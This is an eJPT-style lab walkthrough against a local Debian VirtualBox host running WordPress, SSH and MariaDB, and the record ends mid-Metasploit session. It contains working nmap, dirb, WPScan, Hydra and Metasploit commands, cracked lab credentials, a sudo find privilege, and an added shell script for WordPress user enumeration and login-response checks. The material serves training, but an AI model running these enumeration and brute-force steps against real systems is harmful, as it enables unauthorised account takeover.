Curiosidades De Hackers
eJPT SIMULATION

Debian machine with WordPress


We start with a network scan to find hosts:

sudo nmap -sn 192.168.0.0/24
sudo arp-scan --interface eth0 --localnet

We find several hosts and note them down; in this case we go after 192.168.0.108:


        sudo nmap -sCV -sS -PN -p- -n --min-rate 5000 192.168.0.108
        Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-19 17:25 CEST
        Nmap scan report for 192.168.0.108
        Host is up (0.00028s latency).
        Not shown: 65532 closed tcp ports (reset)
        PORT     STATE SERVICE VERSION
        22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
        | ssh-hostkey: 
        |   2048 44:1a:e9:21:1b:21:c0:c7:b4:55:54:58:45:7a:29:af (RSA)
        |   256 bf:ff:d4:d5:92:58:3e:dd:45:38:fc:3f:12:f1:44:42 (ECDSA)
        |_  256 a0:f0:d7:82:ef:dc:ef:1a:14:88:2e:31:82:b5:61:fc (ED25519)
        80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
        |_http-title: Apache2 Debian Default Page: It works
        |_http-server-header: Apache/2.4.38 (Debian)
        3306/tcp open  mysql   MySQL 5.5.5-10.3.39-MariaDB-0+deb10u1
        | mysql-info: 
        |   Protocol: 10
        |   Version: 5.5.5-10.3.39-MariaDB-0+deb10u1
        |   Thread ID: 38
        |   Capabilities flags: 63486
        |   Some Capabilities: IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, Support41Auth, SupportsCompression, InteractiveClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, ODBCClient, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
        |   Status: Autocommit
        |   Salt: Fmqrj:";@p5U/&q+}Wz!
        |_  Auth Plugin Name: mysql_native_password
        MAC Address: 08:00:27:64:68:6A (Oracle VirtualBox virtual NIC)
        Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
        
        Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
        Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds    
    
    

Next we enumerate each service.

We can see several attack vectors; let's go through them one by one.

We start with port 80.

Port 80

The nmap title already showed Apache's default page ("Apache2 Debian Default Page: It works") still being served, and the directory scan below shows phpinfo.php exposed at the web root. Neither should be reachable on a production host.

Default route

phpinfo.php in particular reveals the PHP version, loaded modules, absolute filesystem paths and environment variables, and can therefore hand over user names, credentials stored in environment variables and the directories worth looking at next.

Let's run a directory scan:


        dirb http://192.168.0.108

        -----------------
        DIRB v2.22    
        By The Dark Raver
        -----------------
        
        START_TIME: Sat Aug 19 17:30:43 2023
        URL_BASE: http://192.168.0.108/
        WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
        
        -----------------
        
        GENERATED WORDS: 4612                                                          
        
        ---- Scanning URL: http://192.168.0.108/ ----
        ==> DIRECTORY: http://192.168.0.108/admin/                                                                         
        ==> DIRECTORY: http://192.168.0.108/Downloads/                                                                     
        + http://192.168.0.108/index.html (CODE:200|SIZE:10701)                                                            
        + http://192.168.0.108/phpinfo.php (CODE:200|SIZE:86447)                                                           
        + http://192.168.0.108/server-status (CODE:403|SIZE:278)                                                           
        ==> DIRECTORY: http://192.168.0.108/wordpress/                                                                     
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/ ----
        + http://192.168.0.108/admin/ChangeLog (CODE:200|SIZE:71006)                                                       
        ==> DIRECTORY: http://192.168.0.108/admin/doc/                                                                     
        ==> DIRECTORY: http://192.168.0.108/admin/examples/                                                                
        + http://192.168.0.108/admin/favicon.ico (CODE:200|SIZE:22486)                                                     
        + http://192.168.0.108/admin/index.php (CODE:200|SIZE:18391)                                                       
        ==> DIRECTORY: http://192.168.0.108/admin/js/                                                                      
        ==> DIRECTORY: http://192.168.0.108/admin/libraries/                                                               
        + http://192.168.0.108/admin/LICENSE (CODE:200|SIZE:18092)                                                         
        ==> DIRECTORY: http://192.168.0.108/admin/locale/                                                                  
        + http://192.168.0.108/admin/README (CODE:200|SIZE:1520)                                                           
        + http://192.168.0.108/admin/robots.txt (CODE:200|SIZE:26)                                                         
        ==> DIRECTORY: http://192.168.0.108/admin/setup/                                                                   
        ==> DIRECTORY: http://192.168.0.108/admin/sql/                                                                     
        ==> DIRECTORY: http://192.168.0.108/admin/templates/                                                               
        ==> DIRECTORY: http://192.168.0.108/admin/themes/                                                                  
        ==> DIRECTORY: http://192.168.0.108/admin/tmp/                                                                     
        ==> DIRECTORY: http://192.168.0.108/admin/vendor/                                                                  
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/Downloads/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/ ----
        + http://192.168.0.108/wordpress/index.php (CODE:301|SIZE:0)                                                       
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/                                                            
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/                                                          
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-includes/                                                         
        + http://192.168.0.108/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                     
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/doc/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/examples/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/js/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/libraries/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/locale/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/setup/ ----
        + http://192.168.0.108/admin/setup/index.php (CODE:200|SIZE:1002)                                                  
        ==> DIRECTORY: http://192.168.0.108/admin/setup/lib/                                                               
        ==> DIRECTORY: http://192.168.0.108/admin/setup/themes/                                                            
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/sql/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/templates/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/themes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/tmp/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/vendor/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/ ----
        + http://192.168.0.108/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                              
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/css/                                                        
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/images/                                                     
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/includes/                                                   
        + http://192.168.0.108/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                              
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/js/                                                         
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/maint/                                                      
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/network/                                                    
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-admin/user/                                                       
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/ ----
        + http://192.168.0.108/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                            
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/plugins/                                                  
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/themes/                                                   
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/upgrade/                                                  
        ==> DIRECTORY: http://192.168.0.108/wordpress/wp-content/uploads/                                                  
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-includes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/setup/lib/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/admin/setup/themes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/css/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/images/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/includes/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/js/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/maint/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/network/ ----
        + http://192.168.0.108/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                      
        + http://192.168.0.108/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                      
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-admin/user/ ----
        + http://192.168.0.108/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                         
        + http://192.168.0.108/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                         
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/plugins/ ----
        + http://192.168.0.108/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                    
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/themes/ ----
        + http://192.168.0.108/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                     
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/upgrade/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                                                           
        ---- Entering directory: http://192.168.0.108/wordpress/wp-content/uploads/ ----
        (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
            (Use mode '-w' if you want to scan it anyway)
                                                                                       
        -----------------
        END_TIME: Sat Aug 19 17:31:23 2023
        DOWNLOADED: 46120 - FOUND: 21
    

We have found a WordPress install under /wordpress/ (with its wp-admin panel), and /admin/ is laid out like phpMyAdmin (setup/, sql/, libraries/, templates/, ChangeLog, LICENSE). Several directories, among them /Downloads/, /admin/sql/ and /wordpress/wp-content/uploads/, have directory listing enabled, and /admin/setup/ is still reachable even though phpMyAdmin recommends removing or protecting it after installation.

WordPress and other services

And we find a WordPress login panel.

Let's run a quick automated WordPress scan with WPScan, enumerating users (`-e u`). It is fast but very noisy in the target's logs:


        wpscan --url http://192.168.0.108/wordpress/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:45:34 2023

 
Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] vagrant
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 19 17:46:05 2023
[+] Requests Done: 62
[+] Cached Requests: 4
[+] Data Sent: 15.437 KB
[+] Data Received: 12.844 MB
[+] Memory used: 153.324 MB
[+] Elapsed time: 00:00:31
    

It has enumerated four users (hugo, admin, philip, vagrant) by walking ?author=1..10 and confirming each one through wp-login.php's error messages. It also reports that xmlrpc.php is reachable, that wp-content/uploads/ has directory listing enabled, and that the WordPress version is 6.2.2 (outdated).

Let's try a password attack with WPScan against the enumerated users (with no --usernames given, WPScan first enumerates users and then attacks them):


        wpscan --url http://192.168.0.108/wordpress/ --passwords /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.108/wordpress/ [192.168.0.108]
[+] Started: Sat Aug 19 17:54:47 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.108/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.108/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.108/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.108/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Outdated, released on 2023-05-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.0.108/wordpress/, Match: 'WordPress 6.2.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] vagrant
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 4 user/s
[SUCCESS] - philip / password                                                                                       
[SUCCESS] - admin / password                                                                                        
[SUCCESS] - hugo / 987654321                                                                                        
^Cying vagrant / misty123 Time: 00:04:13 <                                > (11455 / 57377660)  0.01%  ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: philip, Password: password
 | Username: admin, Password: password
 | Username: hugo, Password: 987654321

[!] No WPScan API Token given, as a result vulnerability data has not been output. / 57377660)  0.01%  ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 19 17:59:44 2023
[+] Requests Done: 11622
[+] Cached Requests: 40
[+] Data Sent: 6.1 MB
[+] Data Received: 6.798 MB
[+] Memory used: 257.57 MB
[+] Elapsed time: 00:04:57

Scan Aborted: Canceled by User
    

Three valid passwords came out before we aborted the run: philip/password, admin/password and hugo/987654321 (vagrant's was still being guessed). Note that no plugins were found and the theme could not be detected, and that the password attack ran over xmlrpc.php rather than wp-login.php. That is why leaving XML-RPC exposed matters: it is a second login endpoint, which lockout rules written only for wp-login.php do not cover.

WhatWeb also gives us useful information:


        whatweb http://192.168.0.108/wordpress
http://192.168.0.108/wordpress [301 Moved Permanently] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], 
IP[192.168.0.108], RedirectLocation[http://192.168.0.108/wordpress/], Title[301 Moved Permanently]                                                                                                          

http://192.168.0.108/wordpress/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], 
IP[192.168.0.108], MetaGenerator[Elementor 3.13.4; features: e_dom_optimization, e_optimized_assets_loading, e_optimized_css_loading, 
a11y_improvements, additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap,WordPress 6.2.2], 
Script, UncommonHeaders[link], WordPress[6.2.2]
    

Note that WhatWeb's MetaGenerator entry reveals Elementor 3.13.4, a plugin that WPScan's passive plugin enumeration did not report, so the two tools complement each other.

Let's try brute force against wp-login.php with Hydra:


        hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.168.0.108 http-post-form '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:S=302'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:06:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1009 login tries (l:1/p:1009), ~64 tries per task
[DATA] attacking http-post-form://192.168.0.108:80/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:302
[80][http-post-form] host: 192.168.0.108   login: admin   password: password
[80][http-post-form] host: 192.168.0.108   login: admin   password: password

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:06:38
    

The third field of http-post-form is the match condition: `S=<text>` treats a response containing that text as a success, `F=<text>` treats it as a failure. WordPress answers a valid login with a 302 redirect to wp-admin and a failed one with a 200 page carrying an error box, so `S=302` is the reliable choice. If you prefer a failure string, it must be the wrong-password text in the site's language; on an English install:

'/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:F=is incorrect'

Do not use "Invalid username" (or "usuario inválido" on a Spanish install) as the failure string: WordPress only prints that kind of message when the username does not exist, so with a valid user every guess would be reported as a hit. That message is useful for the opposite purpose, confirming which usernames exist, which is exactly what WPScan's "Login Error Messages" check does. The same credential is printed twice above; it is a single hit.
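The two checks the tools above depend on, as an added shell example that is not part of the original write-up: WPScan's author-ID walk (a request to /?author=N redirects to /author/<login>/ when that user ID exists) and its confirmation through wp-login.php's error text, which is also what decides the hydra condition (a valid login is a 302 to wp-admin; an English WordPress says the password "is incorrect" for an existing user and that the username "is not registered on this site", or is an "Invalid username" / "Unknown username", for a non-existent one). The offline functions parse constructed responses; the two `curl` helpers are the live versions and take the target URL from the write-up. English WordPress strings are assumed; a localized site returns translated text and the patterns must be adjusted.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up. Two WordPress login oracles
# as shell functions: the ?author=N redirect used to enumerate users, and the
# wp-login.php response classes that WPScan confirms users with and that
# hydra's S=/F= condition has to match. English WordPress strings are assumed;
# a localized install returns translated text.

# Extract the login slug from the Location header of /?author=N.
# Prints nothing when the header is not an /author/<slug>/ redirect.
author_slug() {
  printf '%s\n' "$1" | sed -n 's#.*/author/\([^/?]*\)/\{0,1\}.*#\1#p'
}

# Classify a wp-login.php response by HTTP status and body:
#   valid        302 redirect to wp-admin, credentials accepted
#   bad-password 200, "...password you entered for the username X is incorrect"
#   no-such-user 200, "...username X is not registered..." / "Invalid username"
#   unknown      anything else (lockout plugin, CAPTCHA, translated strings)
classify_login() {
  status=$1
  body=$2
  if [ "$status" = "302" ]; then
    echo valid
  elif printf '%s' "$body" | grep -qi 'is incorrect'; then
    echo bad-password
  elif printf '%s' "$body" | grep -qiE 'is not registered on this site|invalid username|unknown username'; then
    echo no-such-user
  else
    echo unknown
  fi
}

# Live author-ID walk (needs the target): the same 1..10 range WPScan used.
enumerate_authors() {
  base=${1%/}
  max=${2:-10}
  for i in $(seq 1 "$max"); do
    loc=$(curl -s -o /dev/null -D - "$base/?author=$i" \
          | awk 'tolower($1) == "location:" { print $2 }' | tr -d '\r')
    slug=$(author_slug "$loc")
    if [ -n "$slug" ]; then
      printf 'id=%s user=%s\n' "$i" "$slug"
    fi
  done
}

# Live single-credential probe (needs the target); prints the class above.
probe_login() {
  base=${1%/}
  resp=$(curl -s -i --data-urlencode "log=$2" --data-urlencode "pwd=$3" \
         --data 'wp-submit=Log+In' "$base/wp-login.php")
  status=$(printf '%s\n' "$resp" | sed -n '1s#^HTTP/[0-9.]* \([0-9][0-9]*\).*#\1#p')
  classify_login "$status" "$resp"
}

# Constructed samples (not captured from the target), in the shape WordPress
# 6.x emits; these run offline.
SAMPLE_LOCATION='http://192.168.0.108/wordpress/author/hugo/'
SAMPLE_BAD_PW='<div id="login_error"><strong>Error:</strong> The password you entered for the username <strong>admin</strong> is incorrect.</div>'
SAMPLE_NO_USER='<div id="login_error"><strong>Error:</strong> The username <strong>bob</strong> is not registered on this site.</div>'

author_slug "$SAMPLE_LOCATION"          # hugo
classify_login 200 "$SAMPLE_BAD_PW"     # bad-password
classify_login 200 "$SAMPLE_NO_USER"    # no-such-user
classify_login 302 ''                   # valid

# Live use against the write-up's target would be:
#   enumerate_authors http://192.168.0.108/wordpress
#   probe_login http://192.168.0.108/wordpress admin password
```

The "unknown" class is the important one in practice: a lockout plugin, a CAPTCHA or a translated error page all fall there, and a brute-force condition that does not account for it will report every guess as a hit or miss every real one.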

Now the SSH service on port 22:

        hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://192.168.0.108
        Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
        
        Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 18:55:51
        [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
        [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
        [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:2/p:3), ~1 try per task
        [DATA] attacking ssh://192.168.0.108:22/
        [22][ssh] host: 192.168.0.108   login: debian   password: debian
        [22][ssh] host: 192.168.0.108   login: vagrant   password: vagrant
        1 of 1 target successfully completed, 1 valid password found
        Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 18:56:04

Two valid credentials come out, debian:debian and vagrant:vagrant. (The captured run reports only 6 login tries, 2 users by 3 passwords, so it used a much shorter list than the command shown; the full Metasploit wordlists take far longer, and SSH brute forcing should be run with `-t 4` as hydra's warning suggests.) We log in over SSH as vagrant:

        vagrant@debian10:~$ hostname -I
        192.168.0.108 
        vagrant@debian10:~$ 

We could also do the same from Metasploit with the ssh_login scanner:

msfconsole
                                                  




        =[ metasploit v6.3.27-dev                          ]
 + -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
 + -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
 + -- --=[ 9 evasion                                       ]
 
 Metasploit tip: You can use help to view all 
 available commands
 Metasploit Documentation: https://docs.metasploit.com/
 
 
 msf6 > search ssh_login
 
 Matching Modules
 ================
 
    #  Name                                    Disclosure Date  Rank    Check  Description
    -  ----                                    ---------------  ----    -----  -----------
    0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
    1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
 
 
 Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
 
 msf6 > use 0
 msf6 auxiliary(scanner/ssh/ssh_login) > 

Next we escalate privileges and look around for more users, cron jobs, passwords and other services. We enumerate users with `cat /etc/passwd`, list cron jobs with `crontab -l`, and check our sudoers privileges with `sudo -l`:

 sudo -l
Matching Defaults entries for vagrant on debian10:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vagrant may run the following commands on debian10:
    (root) NOPASSWD: /usr/bin/find

We move on to the MySQL service on port 3306:

mysql -u root -p -h 192.168.0.108

We try to log in with default passwords:

mysql -u root -p -h 192.168.0.108
        Enter password: 
        ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.109' (using password: NO)

We open Metasploit and see that we cannot get in:

msfconsole
                                                  
        # cowsay++
         ____________                                                                                                       
        < metasploit >                                                                                                      
         ------------                                                                                                       
               \   ,__,                                                                                                     
                \  (oo)____                                                                                                 
                   (__)    )\                                                                                               
                      ||--|| *                                                                                              
                                                                                                                            
        
               =[ metasploit v6.3.27-dev                          ]
        + -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
        + -- --=[ 1385 payloads - 46 encoders - 11 nops           ]
        + -- --=[ 9 evasion                                       ]
        
        Metasploit tip: Adapter names can be used for IP params 
        set LHOST eth0
        Metasploit Documentation: https://docs.metasploit.com/
        
        msf6 > search mysql_login
        
        Matching Modules
        ================
        
